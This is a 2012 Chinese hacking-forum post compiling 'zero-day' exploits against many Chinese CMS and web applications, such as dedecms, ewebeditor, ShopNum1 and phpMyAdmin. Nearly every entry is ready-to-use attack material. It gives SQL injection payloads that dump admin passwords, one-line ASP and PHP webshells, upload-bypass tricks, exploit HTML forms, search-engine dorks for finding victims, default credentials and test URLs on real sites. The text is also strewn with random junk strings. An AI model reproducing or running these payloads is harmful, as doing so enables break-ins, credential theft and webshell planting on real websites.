找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2893|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
% d  \8 c) K" b! q7 h
: o* I0 D9 O# q9 k直接上exploit:! _+ Y* Y+ L! F9 Q* S8 x
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
: T9 O. t1 U9 C: L, Itest:http://www.tb11.net/system/xitong/shownews.asp?id=210
1 J' \% U* K( [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 G, N! }* t* D: X7 u+ g3 {Asprain论坛 注册用户 上传图片就可拿到webshell
5 y/ ^- H8 C. C. t& F9 ^/ n6 {0 S. `" R2 Z/ Q
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。, r. l$ N  @2 ~$ R8 {9 Y' }1 L$ _
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
7 l6 a6 [8 i2 q# `2.gif 为一小图片文件,一定要小,比如qq表情图片
( J: z2 W- i/ ~  s3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
+ J7 ?. [) L5 i+ \  Y4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了# g1 R' y8 g; \, e' i* l$ q
5.q.asp;.gif- F; b4 _3 d. {# g9 _  I
google:Powered by Asprain
* J* j, O* g* _--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 [; a0 C6 F9 a( ^2 k6 G; n+ O- j( ^3 X% z! I& [* X: a  w0 Q* p) x
ShopNum1全部系统存在上传漏洞。
0 A% _# b6 e: v5 D  ]$ P4 q! a# K$ P! l
8 P" n, ^( R7 @) F7 ?! p0 |+ p) C首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
2 G3 M" T: O* g0 T按说明 提示登录后台。。
  E3 m2 }# W/ {4 q9 |9 p' B在后台功能页面->附件管理->附件列表1 w5 ^! E& N$ B3 S
可以直接上传.aspx 后缀木马* }) \+ h; c, x; [2 Z8 |- [
http://demo.shopnum1.com/upload/20110720083822500.aspx
; a; B( @% J2 k+ g% H8 }9 Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' D' g; `6 Q' S* R7 e, i( a- P7 ^1 o  g* W9 T* v
牛牛CMS中小企业网站管理系统 上传漏洞
; L- {; b5 F9 k5 W
3 `, A4 a4 ~* r6 z$ I  v6 a牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
  }$ m" c+ s9 }/ q! l后台:admin/login.asp* F6 Y9 L- I& J& X3 {
ewebeditor 5.5 Nday! u1 ?, L* F9 }
exp:
+ Q% Y- {9 ]& D' b, M6 T<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?7 B' m6 D, f8 y9 k8 Z
<input?type=file?name=uploadfile?size=100><br><br>?
% {% C4 R( S! O. M5 q- C- d6 j<input?type=submit?value=upload>?
! {% y1 G/ W$ D</form>0 I* H" G! ^% p9 C
ps:先上传小马.7 h" N3 W* w+ Z0 [/ q6 l/ E
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
8 L5 k4 }5 U3 ]$ T' r0 C4 i) d* n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 K( E) S) n4 D4 f9 f0 |

3 v3 S0 r5 ~+ K7 r! s/ IYothCMS 遍历目录漏洞
& m" U7 o9 l+ B/ q  N! }7 K! _# z, B2 P- s6 a7 f' _) U  h' l
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
5 }0 d& ]( }6 j0 k4 s7 T* Y" a默认后台:admin/login.asp
2 A& f/ z+ I$ b5 m! L( A遍历目录:
: c# O; O5 ^. Uewebeditor/manage/upload.asp?id=1&dir=../* C0 g( W7 ^8 e) {( r% R: X
data:
+ L- m# m( ~2 k' Bhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
- n9 q. H$ z# T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: ~- c% ^, e$ |( F; d9 Y

, T6 P" u, y6 A2 d  eNet112企业建站系统 1.0
! ~, ^/ d2 ]( |6 B' C" U& y
" _1 F9 W5 f8 G8 k! h6 U源码简介:
/ p- {4 c+ }8 ~Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
9 q7 r% o% T" w0 d0 n7 L/ A添加管理员:! S- N( P" m: z7 G2 U8 L
http://www.0855.tv/admin/admin.asp?action=add&level=22 M, e/ B8 V7 Z! O* I* R: R0 d0 O# R
其实加不加都不是很重要,后台文件都没怎么作验证。
2 Q1 M. S: @% O+ D8 M; K上传路径:
4 L7 r  Y( Y. X; a% @http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
8 a3 s3 e- T( k6 k7 {# |http://www.0855.tv/inc/Upfile.asp?Stype=2
, V0 ~0 O  I5 w" A' ~4 F: R! N怎么利用自己研究。7 v8 v8 N9 ]) o: I8 D. A# @
遍历目录:
2 @' ?; }3 W& z& ]$ N3 Mhttp://www.0855.tv/admin/upfile.asp?path=../..
( l+ a0 {0 E8 G, Y如:+ I+ e, C, E9 `# {! ~8 R; I: i
http://www.0855.tv/admin/upfile.asp?path=../admin
* |. G% p8 C% Phttp://www.0855.tv/admin/upfile.asp?path=../data
  S9 `5 s1 x! I. R/ H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: _; z' z0 {3 j" P0 P7 |# U! q$ Z1 ]' N+ k3 k
易和阳光购物商城通杀 上传漏洞  I9 }* K$ u2 E3 E
* f3 s6 o$ b6 R9 z- r  ~# P
前提要求是IIS6.0+asp坏境。! |/ S7 F! _1 D
漏洞文件Iheeo_upfile.asp 0 P; |; D  F" M  b3 U" c4 q1 Q9 K
过滤不严.直接可以iis6.0上传
- r& M% X' S, y# V( R% `把ASP木马改成0855.asp;1.gif' _# @, @$ E2 D+ E
直接放到明小子上传
% p/ X& d( ]- V. {Google搜索:inurl:product.asp?Iheeoid=/ l# M7 r& @4 U! W# e" V8 j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 _1 {# \. g7 S
" N7 g4 b* Z8 n- m7 r$ H8 yphpmyadmin后台4种拿shell方法0 r( }2 \7 b1 o1 S

+ ~7 r, g8 c9 p& J4 U  w方法一:
. |0 n+ u5 }, M/ \( E) o; z& t" h+ aCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );5 n' j# N# b/ ?. Q8 ^+ l& s7 Y
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 _' v4 u5 I; a7 x4 U6 ?SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';( L6 ?! o5 p. @8 p$ c9 n* h( L. [
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
6 O; q. v. D. {- E# E. d一句话连接密码:xiaoma
% ^, }1 H, f2 k5 Q; l, D方法二:
2 w4 J# i9 d9 @; Y; x3 ]6 q  ]Create TABLE xiaoma (xiaoma1 text NOT NULL);7 d0 h; Z! f# v8 }9 `
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
9 p9 j/ d+ q. r* n. L+ K# [select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
' ^" z: |; m* n. G% \; l. h6 `Drop TABLE IF EXISTS xiaoma;5 r3 }: k8 e" E3 _
方法三:
1 {' p) `5 z2 }  t) Z+ k读取文件内容:    select load_file('E:/xamp/www/s.php');
+ p/ U2 X( g# A+ F1 ?2 L" C写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'- E$ U! c0 r: y
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# ~( y: Y2 Y  w& O( d方法四:/ O, L% ~+ |* h& X+ L/ w) s) G
select load_file('E:/xamp/www/xiaoma.php');
& L9 G# q$ [) l+ q; T! O$ nselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, R$ ~5 Z: v' D8 P5 ?  w, a( a) F然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
! w! ~! G4 h, u/ P% S) V- r- W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 u: \4 a+ k5 b0 D# ^  t4 x3 R/ K) d' D
传信网络独立开发网站源码0day漏洞$ @4 ?  T% f( u0 X# l
! V" Z! X2 a8 t# N" z  t
后台system/login.asp
: r/ t& L; y/ y9 O+ F6 M$ Z进了后台有个ewebeditor
0 P& d; r; E( x3 ~6 [: K( ~Google 搜索inurl:product1.asp?tyc=
2 p# \# Q3 g/ [  p# V; K% c编辑器漏洞默认后台ubbcode/admin_login.asp7 e/ r' [* \$ T" h. [( E
数据库ubbcode/db/ewebeditor.mdb
9 d5 o% [- ^3 R& L默认账号密码yzm 111111; z7 t7 x# l* @( h
% T& f; l( C1 B/ o9 s- i/ ^
拿webshell方法
4 Z0 x3 X- _2 c登陆后台点击“样式管理”-选择新增样式 ( I4 X5 I6 _% h. B: `
样式名称:scriptkiddies 随便写
, L2 s; N* ]- B路径模式:选择绝对路径
5 s6 ?8 k, v) z: R; ~图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
  G* |1 ^6 Q4 i5 Z图片类型比如就是我们要上传的ASP木马格式5 Z; u3 J* J7 \7 R- G* p
上传路径:/+ I- c- t4 K( A) N! f
图片限制:写上1000 免的上不了我们的asp木马) v" V0 j0 t- y% T: Y7 _
上传内容不要写; p) K. z1 B7 ~; F. d1 `3 `% M
可以提交了
- w. o+ l+ N1 k, Q7 F# m样式增加成功!
5 o$ @( `/ ]" Z/ Z& H, H) J  M返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
  {3 u3 B) k, ?' \6 P( U按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
( G+ k  n, Z$ T* j: d& J4 k网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies/ ^5 e2 b+ E: B7 h3 d
上ASP木马 回车 等到路径( J3 _# U. O  I1 Y% y1 b

: ]# {( K+ a; G# J) r后台:system/login.asp; f; x  b  j3 r/ h7 u% P
Exp:2 l! p* E. @- O8 r1 I5 o; p6 p
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
8 g  P6 I& t7 S测试:! x, F% f% G; F' V2 `6 ?% E+ Y( ]
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master9 |7 u2 E1 ], x& t; u- S1 r
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master+ W- e! ^- g1 C- `# d8 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- l( p. W% u6 i8 j2 G# r( O+ P8 T- N. B. }- G% K9 ~6 k* X7 x
foosun 0day 最新注入漏洞/ ~, O9 l5 i4 s$ G% C) o
: n; D/ x/ W8 [* n6 u; W
漏洞文件:www.xxx.com/user/SetNextOptions.asp
7 r. |4 ~" {: @* W* d' s利用简单的方法:
" O( m* v4 P6 `暴管理员帐号:
/ }0 R) z/ B+ r8 k8 R8 Qhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin9 f  F/ p$ Y3 k4 M' J4 Z5 H
暴管理员密码:2 e# j3 i3 |5 A
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
8 E, Z' Y* y( f2 w! H8 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 y/ c# E  {2 n) T  n

% P" w0 O4 \0 H6 B# U网站程序的版权未知!2 l5 J2 d7 ?# |; M& U  S

2 `" }" L& w: N5 v默认网站数据库:
0 e3 @1 s7 J! z$ X* ]www.i0day.com/data/nxnews.mdb
3 V0 [: B$ q5 g6 yewebeditor 在线编辑器:
' O4 b# R( n: C8 @; Z1 D9 H+ [编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
: @9 ~- a2 C/ @& i登录地址:ewebeditor/admin_login.asp1 d4 M1 S6 ^/ g" J8 s
默认密码:admin  admin& p7 _! L# W% U% z' }
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
: O. D( ]* l7 y2 i; D7 d5 k. I1 U1 c7 \' W: Y5 V+ C$ t
Sql注入漏洞:; |. @+ n% F: @& T7 C
http://www.i0day.com/detail.asp?id=12* K/ h$ r2 m! ~) k4 W8 @& D
exp:+ P7 _" u  M4 L/ i
union select 1,admin,password,4,5,6,7,8 from admin
. s) K. M. N- o; e爆出明文帐号/密码1 s# F# }3 L" d# [

# E) E; h) {0 _上传漏洞:; G3 Q' C+ l% {1 W' z
后台+upfile.asp; d/ [2 y, ^; o) k" a! @5 D
如:) q- y' y# D. U4 h! `. U8 T
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
! r! N, k" q+ Ashell的地址:网址+后台+成功上传的马
5 [5 |0 j  S" @2 d) k8 qgoogle:inurl:news.asp?lanmuName=
, _& @, t4 j6 v% A* i------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 s2 Y' d/ K9 n$ W& |, @
9 a! V- x4 D: X: R  w' kdedecms最新0day利用不进后台直接拿WEBSHELL
9 |) A+ x1 U  p7 w; a
, S" _" E! N- {2 i拿webshell的方法如下:3 c' k6 a$ r3 c; ]) t
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
# r% L. D) v+ q. b前题条件,必须准备好自己的dede数据库,然后插入数据:
# Y+ H6 }% L/ P* W6 ]; oinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
# {! k' M3 {% G3 |5 }# p8 K# I0 y
! d3 V$ L7 g, d# o& i/ v再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) A+ ~# M  [5 M# u' E0 i1 a<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
. x6 N4 I. l' v8 r6 A/ \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />6 u+ w* q; `* y" p4 ]4 X' x0 {' m! f3 F
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />9 T) m3 v2 Q& }7 K
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 c+ r) c# v. Q; Y0 d- j, g<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />0 P  e8 Z( ~: ?# `; Y
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 e+ t) V  J8 ~
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />% E1 q( s- D& w" F$ ]: @0 a# ]1 Z
<input type="text" value="true" name="nocache" style="width:400">( O+ d+ e% V, r! B, s
<input type="submit" value="提交" name="QuickSearchBtn"><br />2 \/ j9 ^6 F0 j' l: c9 t/ o; H
</form>
0 O+ H( n* |2 {) H<script>, k. r- B. F! g) u' O
function addaction()
4 d: D* }: O+ k{2 s5 E& ^# R5 ]7 D/ ?# |
document.QuickSearch.action=document.QuickSearch.doaction.value;: W0 G8 V6 u- v
}: }  |7 q+ Y% u7 X1 o' H
</script>
+ G# ], N4 B: B3 W-----------------------------------------------------------------------------------------------------------------------------------------------4 c+ e4 J% s0 E0 N) N

- x# {& N$ P5 _5 J& M; Mdedecms织梦暴最新严重0day漏洞- k/ \" |& {4 V( N
bug被利用步骤如下:
& m; o- s& _+ W$ z/ d& u9 ?2 q( ^http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
; o& h2 d, j2 W* c1 M8 V3 `把上面{}上的字母改为当前的验证码,即可直接进入网站后台。$ c* H9 {/ R. m* x5 v6 j* V, z/ ~
-------------------------------------------------------------------------------------------------------------------------------------------" i+ e5 A0 y. _& L- O1 C/ A

% z( X) e; E/ O多多淘宝客程序上传漏洞 * g% \8 E# f; |) T6 h2 J& t7 H, B5 Q9 @
漏洞页面:
; V, T$ A3 l- Q! O: d- W9 gadmin\upload_pic.php
& d1 z/ u0 l6 z2 d' l传送门:
, j! p3 Z5 K* \$ p" r4 nhttp://www.www.com/admin/upload_pic.php?uploadtext=slide14 q/ k9 i3 m7 j+ i+ [+ x, Q
PS:copy张图片马 直接  xxx.php 上传抓包地址!
! P1 }4 x) N: E/ Q( i4 ]0 h, Z------------------------------------------------------------------------------------------------------------------------------------------------------' [4 f; n. h* }$ J* @; R

2 G( Z3 R5 P9 z9 X. @: K7 i无忧公司系统ASP专业版后台上传漏洞
0 j6 w4 y; t. L, G漏洞文件 后台上传
4 R. Z+ l- g6 l  cadmin/uploadPic.asp
/ p6 R/ r" ~( j# }3 o漏洞利用 这个漏洞好像是雷池的! M  A4 i" K) s* W% x
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
: B/ u' s" z. W8 L- h  q# b等到的webshell路径:
5 a1 l! `* @' _# \) r- p- d/UploadFiles/scriptkiddies.asp;_2.gif; V1 |% j+ d( u2 P4 Y/ B1 \
---------------------------------------------------------------------------------------------------------------------------------------------------
/ b- e# c: B! U* {8 Z! V, r. U4 g# r) b: X. i) G% _
住哪酒店分销联盟系统2010
  q# ^, e! w# I; }Search:- I9 ?5 ~$ j0 d% e7 U- K
inurl:index.php?m=hotelinfo* \4 d  v. [! J4 ]- ?
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin5 Q- f) C) i& W. r/ h5 W& L$ r4 O
默认后台:index.php?m=admin/login
, B) l9 D7 j+ Y# c4 i--------------------------------------------------------------------------------------------------------------------------------------------------
7 }  j9 }+ ~, }8 k( O! d+ T9 I( w
$ l7 y+ e& Z- U6 B2 u. ]! minurl:info_Print.asp?ArticleID=/ @8 F3 z9 u- t6 E" }
后台 ad_login.asp1 @3 q: M4 _8 ^8 }( Z
爆管理员密码:8 @9 \1 i: C" q3 t( g
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin; N, n% |3 p8 u  z, d' _5 }4 d
------------------------------------------------------------------------------------------------------------------------------------------------------------' n+ N/ L9 D7 B0 f4 p0 z' b1 }  u
7 {7 ^' U1 N6 C- _7 b7 N
搜索框漏洞!
8 q: N+ P$ R4 h* v4 S%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='( H5 U5 u. c! k( r8 g  r
--------------------------------------------------------------------------------------------------------------------------------------------------------
4 P! G- `" f' U5 Z$ W" s0 j8 e4 {3 w+ y5 f
关键字:
% ^6 b5 B+ |6 [+ p0 Yinurl:/reg_TemletSel.asp?step=2
$ z8 {3 k! w  R# B! K: J或者
# b1 S0 f9 c" B" E% i电子商务自助建站--您理想的助手
7 J" P& b" s/ m6 x# o0 {( T7 J-------------------------------------------------------------------------------------------------------------------------------------------------
* w, I9 I1 p* `! W6 q6 \9 j% g8 c, l: l  l5 A
iGiveTest 2.1.0注入漏洞
$ U: v" p, E+ y6 w  ^Version: <= 2.1.06 D' c$ Z8 y, x/ d- a! ?+ I
# Homepage: http://iGiveTest.com/, }8 f  s; G9 ?' i! L; H& E
谷歌关键字: “Powered by iGiveTest”
8 @, u' }. Y5 z1 T随便注册一个帐号。然后暴管理员帐号和密码- q: M! i# h1 Q# b6 t
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
, z- y0 N- w  R------------------------------------------------------------------------------------------------------------------------------------------------
0 u, J, m) w/ a7 s& |  H
6 N$ U% W! N5 p8 @, jCKXP网上书店注入漏洞% D  l; w: \. G/ ?& q% l
工具加表:shop_admin 加字段:admin; F+ t% g" e& c* @3 K+ j
后台:admin/login.asp
. k  O; Q: |* M登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
4 K4 l! r0 O$ X0 ?4 H. k  v: I7 \inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息0 ^, b" Y8 s1 Z; q0 ~8 @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. {, }0 d5 J1 o8 O/ ]4 I+ K3 [1 \' m. y+ N) A1 v
段富超个人网站系统留言本写马漏洞% x1 y% j! k$ h
源码下载:http://www.mycodes.net/24/2149.htm
! z) q! O. V' w$ Zaddgbook.asp 提交一句话。
& {$ m/ P- L2 t, F' T3 K: W1 {连接: http://www.xxxx.tv/date/date3f.asp6 o# G9 ?& g( U% X
google:为防批量,特略!
0 H% ?$ F8 x' w3 C+ n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 A" i  D. i9 m) |8 {

% e, k% ^+ l( F智有道专业旅游系统v1.0 注入及列目录漏洞
1 r% o; H$ Y9 C: F2 j默认后台路径:/admin/login.asp/ J! a8 C5 I: h
默认管理员:admin: T, k; m$ P5 k4 N+ H, p3 F& F9 d
默认密码:123456
' A6 K) M* q* t$ bSQL EXP Tset:! ^0 P& O9 H" V; Q7 b8 j
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin/ @4 W$ j6 w. j
------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 t9 `* \6 o+ q- U! p6 @
9 x3 M  W" t1 r( F" Z( l
ewebeditor(PHP) Ver 3.8 本任意文件上传0day+ b9 h% e: v- c: {" g" u
EXP:4 D8 p% ]1 @" B1 j: N
<title>eWebeditoR3.8 for php任意文件上EXP</title>$ i$ o% s& o  N1 A0 o
<form action="" method=post enctype="multip: t. x9 R  F6 N6 P" _' m  W$ _
art/form-data">
  g# |- }$ G: H) N* A, R<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
/ v% T) D0 l" O8 ZURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
. t  l. m, s1 K  @+ D$ z<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 9 n) s. f& A5 {! l
file:<input type=file name="uploadfile"><br> 7 R$ @! z( J; q9 s1 i; f9 o" A3 [
<input type=button value=submit onclick=fsubmit()> + E  }: V5 c$ o  V2 Z3 Z9 K
</form><br>
$ P: {9 z. v- p7 v8 V! b<script> 6 E- g) b# w% C6 {; C$ [. R
function fsubmit(){
! [( s+ \  C4 Y4 L* ~3 Qform = document.forms[0];
% ]% ?8 Y  v4 `form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
; V5 U! l4 @$ V9 t+ N  v6 aalert(form.action);
0 h: s: o7 Q7 v* bform.submit(); $ Y8 e# D+ J, s* A( u* }3 R
}
. A! L1 i' V, j1 {5 T- h</script># `( D1 q" j; e- @! l6 L5 ?- k* d
注意修改里面ewebeditor的名称还有路径。- B* K+ h+ t2 K" M9 \
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, F4 P/ y' L- Z- s) ^7 q6 Q6 ]

2 K" _% F4 P! c, a8 \0 N3 {提交’时提示ip被记录 防注入系统的利用
4 B3 y4 N/ d. ^2 |' }9 p3 n网址:http://www.xxx.com/newslist.asp?id=122
0 F; P* N, ~5 B; c$ q+ S提示“你的操作已被记录!”等信息。
3 ^- e7 \5 T3 A  g5 n8 _$ Y7 A# `利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
! K9 D7 f3 ?& W# j. u8 G7 h: S. q-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, f$ E7 o3 p$ r9 C% v4 Y- j& s0 [% ^* h' b& C" T- p! O6 k( ]
西部商务网站管理系统 批量拿shell-0day
' B- U1 a4 g% B, @0 d这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ) [1 ?# X* ]% y5 U6 _
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
4 R/ l6 c1 r. m2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合7 m1 ~' K8 j& X6 ]5 n
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
' T7 @" h* i$ U3 q  d---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% f/ G- z1 F% r) {& }! p( E- d( Z( K& E5 f* o" D, M
JspRun!6.0 论坛管理后台注入漏洞
1 h0 l- q/ E. A9 T. h, }. m8 |' h* y8 X* c! I
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:1 v- g1 b4 S/ \
JspRun!6.0
3 X* K) W/ o- M+ x& `: _+ D5 U漏洞描述:
1 o+ ~3 \& ?' ^3 vJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
/ u  N: T. `5 F3 ]. R* O# m在处理后台提交的文件中ForumManageAction.java第1940行! B+ a# e& t( g0 f& r% `, m
String export = request.getParameter("export");//直接获取,没有安全过滤
$ l! L4 b$ [% a; }if(export!=null){0 l) o* D6 W: p1 W8 F# n6 e
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
% N" g8 C: T  I$ Mif(styles==null||styles.size()==0){% S" a1 y. T/ V& R1 _' i
<*参考: `( l* ]/ X. E5 m$ ]
nuanfan@gmail.com
* [, n: L( J) t: R8 A*> SEBUG安全建议:0 {, H  k+ E5 w
www.jsprun.net
. V0 A$ s; H. `  P* t(1)安全过滤变量export
" Z/ m8 L: }: m5 [& H* u* P0 J(2)在查询语句中使用占位符
' g8 w9 T2 C3 ~------------------------------------------------------------------------------------------------------------------------------------------------------------------------------; S# `5 n9 z  ~

. n8 }2 _- b8 d$ X$ v# W( m乌邦图企业网站系统 cookies 注入
& @6 e+ i9 T2 Y3 X$ Q
: @/ H; j9 c6 @; p% ^- T程序完整登陆后台:/admin/login.asp
8 q; q; c9 ]8 U5 \3 J默认登陆帐号:admin 密码:admin888
6 p7 C( i# G( Z% }. P- v/ h) n语句:(前面加个空格)2 S; G% `% m; E! a$ G* I, f
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin' L" {& \7 P, E. F, [/ K
或者是16个字段:
3 R8 ]6 Z( d* S0 F1 D" {1 Yand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin. c3 c, x# j; t! a4 f
爆不出来自己猜字段。4 t" g4 [; x* {- w8 Z
注入点:http://www.untnt.com/shownews.asp?=88  e/ v8 \. m4 O5 ]2 ~
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
" @# N9 f/ F1 n8 Y关键字:. t* J9 ?) O' _; i! G( y
inurl:shownews?asp.id=5 R: G4 v6 J: l$ ^3 Y# l
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' W! l# Q4 s4 `& |3 f% A0 U$ }1 X3 F5 T! O" I) F
CKXP网上书店注入漏洞
; P, S+ Z7 H' i$ S( J0 m+ w4 U
  X$ M/ t. n3 W, [7 b+ y工具加表:shop_admin 加字段:admin
7 ]4 u% U' B% `后台:admin/login.asp
8 N! `% F# }2 A# P登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/5 V: E6 Z) V8 n0 x) {9 C8 d
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息6 K" h& U% f$ `% P
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! J7 H# J; U( K* w. n* V, w) j" m

